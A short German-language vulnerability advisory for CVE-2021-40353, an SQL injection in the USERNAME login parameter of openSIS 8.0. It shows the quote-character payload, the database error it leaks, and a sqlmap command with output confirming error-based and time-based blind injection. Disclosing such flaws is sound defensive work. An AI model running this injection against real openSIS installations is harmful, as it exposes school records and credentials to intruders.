
CVE-2021-40353 openSIS 8.0 SQL-Injection-Schwachstelle
CVE-2021-40353 openSIS 8.0 SQL-Injection-Sicherheitslücke https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353
In Version 8.0 von openSIS besteht eine SQL-Injection-Sicherheitslücke, wenn MySQL oder MariaDB als Anwendungsdatenbank verwendet wird. Ein Angreifer kann dann den SQL-Befehl über den USERNAME-Parameter ausgeben.
Verwundbare PHP-Seite:
index.php - USERNAME-Parameter
Vulnerable Payload ' - erzeugt einen Fehler mit Datenbankinformationen " - erzeugt keinen Fehler
Fehler
Datum:
08/31/2021 03:16:22
Fehlermeldung:
Datenbankausführung fehlgeschlagen
SQL: UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'') Traceback: C:\xampp\htdocs\opensis\index.php at 502 Zusätzliche Informationen: Sie haben einen Fehler in Ihrer SQL-Syntax; überprüfen Sie das Handbuch, das Ihrer MariaDB-Serverversion entspricht, auf die richtige Syntax in der Nähe von ''user1'')' in Zeile 1 Datum:
08/31/2021 03:16:22
openSIS hat einen Fehler festgestellt, der durch eine der folgenden Ursachen entstanden sein könnte:
Ungültige Dateneingabe
Datenbank-SQL-Fehler
Programmfehler
Bitte machen Sie einen Screenshot und senden Sie ihn zur Fehlerbehebung und Lösung an Ihren openSIS-Vertreter.
sqlmap -r post_opensis -p USERNAME
[09:38:19] [INFO] POST parameter 'USERNAME' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [09:38:19] [INFO] testing 'MySQL inline queries' [09:38:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [09:38:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [09:38:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:38:46] [INFO] POST parameter 'USERNAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Entdeckt von Brian Lowe, August 2021